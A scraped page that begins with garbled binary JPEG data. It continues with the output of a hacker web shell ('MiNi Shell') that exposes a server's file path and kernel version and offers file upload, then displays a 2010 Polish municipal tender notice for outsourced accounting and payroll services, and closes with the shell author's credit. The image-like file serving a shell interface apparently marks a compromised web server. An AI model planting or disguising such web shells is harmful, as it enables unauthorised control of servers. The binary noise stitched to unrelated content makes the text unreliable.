JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100412/101662-N-2010.html

<p class="kh_header"><b>Lubin: OUTSOURCING usług finansowo-księgowo-płacowych</b><br>
<b>Numer ogłoszenia: 101662 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania sp. z o.o. w Lubinie , ul. Rzeźnicza 1, 59-300 Lubin, woj. dolnośląskie, tel. (076) 7249940, faks (076) 7249950.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OUTSOURCING usług finansowo-księgowo-płacowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Określenie przedmiotu zamówienia za pomocą nazw i kodów ze Wspólnego Słownika Zamówień CPV: 

Kod	Nazwa 
79211000-6	Usługi księgowe
79211110-0	Usługi zarządzania listami płac
79220000-2	Usługi podatkowe
Przedmiotem zamówienia jest prowadzenie na rzecz Zamawiającego rachunkowości finansowej i płacowej, zgodnie z obowiązującymi przepisami prawa polskiego, 
w szczególności:

-	W ZAKRESIE USŁUGOWEGO PROWADZENIA RACHUNKOWOŚCI FINANSOWEJ, SPORZĄDZANIA ROCZNYCH SPRAWOZDAŃ FINANSOWYCH 
I DEKLARACJI PODATKOWYCH -

1)	prowadzenie rachunkowości finansowej Zamawiającego zgodnie z ustawą 
o rachunkowości;
2)	bieżące prowadzenie ksiąg Zamawiającego w języku polskim na podstawie prawidłowych i dostarczonych przez Zamawiającego dowodów oraz w terminach wynikających z przepisów prawa;
3)	uwzględnienie w księgach wyników prowadzonych przez Zamawiającego inwentaryzacji;
4)	wycena aktywów i pasywów;
5)	sporządzenie sprawozdania finansowego na koniec roku gospodarczego (za rok 2010 i 2011);
6)	prowadzenie rejestrów zakupów i sprzedaży dla potrzeb VAT;
7)	sporządzenie deklaracji podatkowych;
8)	reporting stosownie do uzgodnień;
9)	udzielanie wyjaśnień związanych z bieżącym prowadzeniem rachunkowości.
10)	 prowadzenie rachunkowości PKZP przy MPO Sp. z o.o. na podstawie obowiązujących przepisów w tym zakresie w programie komputerowym wykonawcy lub ręcznie.

Prowadzenie ksiąg rachunkowych odbywać się będzie w biurze Wykonawcy przy pomocy programu komputerowego Zamawiającego. Wszelkie wydruki i zestawienia sporządzane metodą komputerową muszą zawierać nazwę Zamawiającego, rok gospodarczy i oznacznik programu komputerowego.

Zamawiający otrzymuje miesięcznie następujące zestawienia tabelaryczne:
a)	ujęte systemowo zestawienia obrotów i sald kont syntetycznych za dany okres rozliczeniowy (miesiąc) oraz narastająco od początku roku gospodarczego;
b)	zestawienie obrotów i sald kont analitycznych za okres rozliczeniowy i narastająco od początku roku gospodarczego (z zestawieniem należności i zobowiązań wg kontrahentów).

Wykonawca sporządza i uzgadnia z Zamawiającym dokumenty rocznego sprawozdania finansowego: bilans, rachunek zysków i strat, informację dodatkową oraz sprawozdanie z przepływów pieniężnych zgodnie z przepisami ustawy o rachunkowości z 1994 roku.  Wykonawca sporządza także zeznanie podatkowe za rok gospodarczy. Usługa ta obejmuje obsługę biegłego rewidenta w przypadku zleconego przez Zmawiającego badania sprawozdania finansowego.

Terminy sporządzania dokumentów rocznego sprawozdania finansowego uzgadniane są z Zamawiającym z uwzględnieniem ustawowych terminów zamknięcia ksiąg 
i sporządzania sprawozdania.

Zamawiający otrzymuje w terminie 30 dni po zatwierdzeniu sprawozdania finansowego kompletny wydruk ze wszystkimi operacjami księgowymi dla celów archiwizacji, deklaracje podatkowe za rozliczone miesiące od stycznia do grudnia, okresowe sprawozdania statystyczne, wszystkie zaksięgowane dowody za rozliczony rok obrotowy.

Wykonawca przygotowuje wymagane i zgodne z obowiązującym prawem podatkowym  miesięczne lub roczne deklaracje podatkowe i inne (PFRON). Usługa ta obejmuje w szczególności:
a)	sporządzanie deklaracji na podatek dochodowy od osób prawnych,
b)	sporządzanie deklaracji na podatek VAT i podatek akcyzowy;
c)	sporządzanie informacji przewidzianych przepisami prawa podatkowego.
d)	sporządzanie innych deklaracji i informacji przewidzianych przepisami prawa podatkowego.
e)	sporządzanie deklaracji miesięcznych wpłat na Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych ( DEK-I-0)
Wykonawca ponosi odpowiedzialność za prawidłowe i terminowe sporządzenie deklaracji podatkowych w zakresie wynikającym z prowadzonych ksiąg rachunkowych, ujmujących wszystkie operacje gospodarcze, które zostały udokumentowane prawidłowo wystawionymi przez Zamawiającego i dostarczonymi Wykonawcy na czas dowodami księgowymi.

Zamawiający odpowiada za zakres, prawidłowość i kompletność danych stanowiących podstawę dla deklaracji podatkowych.
Deklaracje podatkowe podpisywane są przez osobę reprezentującą Zamawiającego oraz przez osobę zatrudnioną przez Wykonawcę i odpowiedzialną za sporządzenie deklaracji.
Wykonawca poinformuje Zamawiającego o osobie odpowiedzialnej za sporządzenie deklaracji.

-	W ZAKRESIE PROWADZENIA RACHUNKOWOŚCI PŁACOWEJ, ZUS 
I FUNDUSZY PRACOWNICZYCH -

1)	Sporządzanie w imieniu Zamawiającego okresowych deklaracji ubezpieczenia społecznego (ZUS, Fundusz Pracy, Fundusz Gwarantowanych Świadczeń Pracowniczych) oraz deklaracji świadczeń wypłaconych w okresie rozliczeniowym zgodnie z przepisami polskiego prawa o ubezpieczeniach społecznych i prawa pracy.
2)	Sporządzenie deklaracji na podatek dochodowy od osób fizycznych z tytułu wynagrodzeń wypłaconych przez Zamawiającego pracownikom lub zleceniobiorcom;
3)	Zamawiający odpowiada za zakres, prawidłowość i kompletność danych stanowiących podstawę dla deklaracji podatkowych.
4)	Deklaracje podatkowe podpisywane są przez osobę reprezentującą Zamawiającego oraz przez osobę zatrudnioną przez Wykonawcę i odpowiedzialną za sporządzenie deklaracji.
5)	Wykonawca poinformuje Zamawiającego o osobie odpowiedzialnej za sporządzenie deklaracji.
6)	Deklaracje podatkowe składane są w urzędzie skarbowym przez Wykonawcę.

-	W ZAKRESIE SPRAWOZDAWCZOŚCI STATYSTYCZNEJ -

1)	Bez uprzedniego zlecenia przez Zamawiającego Wykonawca sporządza następujące dokumenty niezbędne dla potrzeb okresowej sprawozdawczości statystycznej:
a)	sprawozdanie o przychodach, kosztach i wyniku finansowym (F-01/I-01),
b)	sprawozdanie roczne SP (bilans i rachunek zysków i strat)wraz z załącznikami,
c)	roczne sprawozdanie o wynagrodzeniach (symbol początkowy Z),
d)	sprawozdanie o działalności gospodarczej DG-1
 
	W przypadku zmiany przepisów dotyczących statystyki GUS dokonane zostaną odrębne ustalenia.
2)	Wykonawca sporządza wszystkie pozostałe zestawienia statystyczne dla statystyki państwowej, urzędów skarbowych i innych organów państwowych  po uprzednim udzieleniu zlecenia przez Zleceniodawcę. 
3)	W celu zgodnego z przepisami sporządzenia wyżej wymienionych zestawień Wykonawca może żądać od Zamawiającego udostępnienia potrzebnych danych.

4)	Zamawiający ponosi odpowiedzialność za prawidłowość i kompletność danych informacji jak również za ich terminowe przekazanie Wykonawcy.
5)	Wykonawca ponosi odpowiedzialność za prawidłowe i terminowe sporządzanie sprawozdań statystycznych.

-	W ZAKRESIE OBOWIĄZKU UDZIELANIA INFORMACJI I WSPÓŁDZIAŁANIA -

Zamawiający zobowiązuje się do udzielania Wykonawcy wszelkich informacji niezbędnych do wykonania zamówienia, informowania go o wszystkich istotnych wydarzeniach mogących mieć znaczenie dla prawidłowego i całościowego wykonywania zamówienia, a w szczególności o zmianie formy prawnej spółki czy zakresu tej działalności oraz o zmianie siedziby spółki.

Warunki dodatkowe

Warunkiem wymaganym jest posiadanie biura do obsługi zlokalizowanego w granicach administracyjnych miasta Lubina, jeżeli Wykonawca nie posiada takiego biura, w sytuacji przyjęcia przedmiotowego zadania w terminie 30 dni od daty podpisania umowy zobowiązuje się do utworzenia ww. biura do obsługi w granicach administracyjnych miasta Lubina - Warunek ten jest niezbędny do efektywnego wykonania zamówienia, gwarantować ma również sprawny przepływ informacji i dokumentów  pomiędzy stronami umowy.
Odbiór dokumentów od Zamawiającego - co najmniej 2 razy w tygodniu. 
Wykonawca zobowiązany jest do windykacji należności, to jest do wystawiania wezwań do zapłaty oraz przekazywania Zamawiającemu nieuregulowanych wezwań. 
Miejsce wykonania zamówienia: biuro  Wykonawcy.
Pozostałe informacje:
1)	Liczba pracowników 
a)	na umowę o pracę 	113
b)	umowy cywilno prawne 	32
2)	Średnia miesięczna  ilość dokumentów  (operacji):
a)	kasowych: przeciętnie 305 szt., po kwartale 926
b)	bankowych: przeciętnie 1580 szt., po kwartale 5328
c)	zakupowych (przelewanych): 180 szt.
d)	inne (PK): 50 szt.
e)	sprzedażowych: w miesiącu marcu 22.212 w pozostałych miesiącach 
714 ( automatycznie).
Wyżej podane wartość w pkt 1) i 2) są wartościami szacunkowymi, i będą ulegać zmianie w trakcie działalności Spółki i trwania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.	Zamawiający przewiduje w okresie 3 lat od udzielenia niniejszego zamówienia podstawowego udzielenie Wykonawcy zamówień uzupełniających, polegających na powtórzeniu tego samego rodzaju zamówień.
2.	Zamówienia uzupełniające będą stanowiły nie więcej niż 10% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.21.10.00-6, 79.21.11.10-0, 79.22.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że: 
posiada uprawnienia do wykonywania czynności z zakresu usługowego prowadzenia ksiąg rachunkowych, w tym celu Wykonawca przedstawi dokumenty określone w rozdziale IX SIWZ w pkt. 1b</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna, iż Wykonawca spełnia warunek jeżeli wykaże realizację 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w  tym okresie - co najmniej dwóch usług finansowo - księgowo - płacowych świadczonych na rzecz podmiotów posiadających księgi rachunkowe (pełna obsługa księgowa) wraz 
z dokumentami potwierdzającymi ze usługi zostały wykonane lub 
są wykonywane należycie, w tym celu przedstawi dokumenty określone 
w rozdziale IX SIWZ w pkt 1 c,d</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
dysponuje: 
a) osobą posiadającą uprawnienia biegłego rewidenta w tym celu przedstawi   oświadczenie określone w rozdziale IX w pkt 1 f).
oraz
b) wielkość średniego rocznego zatrudnienia u wykonawcy usług (w tym personel kierowniczy) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku gdy okres działalności jest krótszy - w tym okresie wynosi minimum 3 osób (w tym personel kierowniczy), w tym celu Wykonawca przedstawi Zamawiającemu oświadczenie określone rozdziale IX SIWZ w pkt e)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do SIWZ określonego w rozdziale IX SIWZ w pkt 1 a)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, (niezależnie od charakteru prawnego łączących go z nimi stosunków) zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Wzór zobowiązania stanowi załącznik nr 8 do SIWZ. 

2.Pozostałe dokumenty bezwzględnie wymagane w ofercie

a)	Wypełniony Formularz ofertowy zgodnie z załącznikiem nr 1 do SIWZ
b)	Zamawiający żąda, aby Wykonawca do oferty ( tylko w przypadku jeżeli z dokumentów
dołączonych  do oferty nie wynika uprawnienie do podpisania oferty) dołączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty np. aktualne zaświadczenie  o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy. Wymagane dokumenty można złożyć 
w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
c)	Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika 
z załączonego dokumentu o którym mowa w pkt 4 b) nn rozdziału do oferty należy dołączyć także pełnomocnictwo w oryginale lub w postaci kopii poświadczonej za zgodność z oryginałem przez notariusza.
d)	Dokument ustanawiający pełnomocnika i upoważniający go do podpisywania oferty oraz reprezentowania podmiotów występujących wspólnie w niniejszym postępowaniu - tyko w przypadku złożenia ofert wspólnej.

4.Zgodnie z art. 23 ust.1 Prawa zamówień publicznych wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia składając następujące dokumenty:
a)	Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oddzielne dokumenty wymienione w rozdziale iX SIWZ w pkt 1a,2a,2 b,2c, 2d 
b)	Oświadczenie o ustanowieniu pełnomocnika do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
c)	Dokumenty, o których mowa w pkt 1b,1c,1d,1e,1f rozdziału IX SIWZ- winni złożyć wspólnie. 

7.	W przypadku składania oferty przez spółkę cywilną, dokumenty o których mowa w pkt 1a, 2a, 2b, 2c, 2d rozdziału IX SIWZ. dotyczyć winny każdego ze wspólników tej spółki. Dodatkowo należy załączyć do oferty dokumenty, o których mowa w pkt  2c, 2d  rozdziału IX SIWZ dla spółki. 

Forma dokumentów w jakiej muszą być złożone określona jest w rozdziale XIV Opis sposobu przygotowania oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpo.lubin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiebiorstwo Oczyszczania Spółka z o.o.
ul. Rzeźnicza 1, 59-300 Lubin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2010 godzina 09:00, miejsce: Miejskie Przedsiebiorstwo Oczyszczania Spółka z o.o.
ul. Rzeźnicza 1, 59-300 Lubin w sekretariacie, pokój 305.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com